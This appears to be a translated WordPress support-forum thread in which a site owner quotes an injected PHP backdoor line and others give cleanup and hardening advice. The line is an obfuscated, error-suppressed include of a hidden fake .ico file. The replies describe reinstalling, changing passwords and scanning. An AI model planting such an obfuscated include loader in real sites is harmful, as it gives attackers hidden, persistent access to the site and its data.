我的wordpress网站似乎被黑客入侵了。以下代码片段位于index.php,wp-config.php 中
<?php
/*6b9bb*/
@include "�57ho155e/151nt145r7�602/160ub154ic137ht155l/167p-151nc154ud145s/152s/164in171mc145/.146b4�63d6�700.151co";
/*6b9bb*/
我已更改:
- WP管理员URL并输入强密码用户名
- 更改了带有强密码的cpanel/FTP密码
- 实施iTheme安全
- 将Wordpress更新为最新版本(主题和插件)
但是,代码再次重复。什么是好的解决方案?
附言:我正在使用场地。
感谢
是的,有人包含了一个.ico文件(用文本编辑器打开它,你会看到它是一些php代码,没有真正的ico文件)
/home/inter702/public_html/wp includes/js/tinymce/.fb43d680.ico
不知怎的,尽管你更改了主机和密码,黑客还是可以进入,一旦他们进入,他们就可以设置各种后门来保持访问权限,他们的任何.php文件都可以做到这一点。目前,关闭他们最初使用的前门是你的唯一职业。
遵循本文中的建议:https://codex.wordpress.org/FAQ_My_site_was_hacked然后:https://codex.wordpress.org/Hardening_WordPress
以下是一些关于后门的链接:http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/http://ottopress.com/2009/hacked-wordpress-backdoors/
来源:https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
在我看来,一旦网站被黑客入侵,抵抗是徒劳的。没有任何扫描或工具可以帮助您。你将不得不用新下载的文件替换所有文件。主要是直接的:
- 备份整个安装(以防万一)
- 下载完整的wp内容/上传文件夹
- 制作屏幕截图或使用当前活动的插件保存页面
- 删除所有文件
- 获取全新的wordpress设置并提取
- 下载主题和子主题的新副本(重新创建以前的设置)
- 将以前的wp-config.php复制到此新安装。但要好好看看。通常它里面也有一些病毒/后门。通常很容易看到和清除。现在您已经连接到数据库
- 检查保存的上传文件夹中不应该存在的文件,如php文件。然后上传到新文件夹
- 重新安装所有插件,全新下载
我也遇到了这个问题,我一步一步地完成了以下步骤:
- 手动清理注入的代码
- 更改所有密码
- 隐藏WP管理面板URL
- 限制登录尝试
- 安装安全插件(Sucuri、Wordfence安全)
- 与苏库里计划签订合同好的办法是安装Wordfence安全插件,运行扫描,然后你会检测到所有带有注入代码的文件,你可以手动清理注入的代码。你也可以访问这个链接https://naderzad.info/web-development/wordpress-code-injection/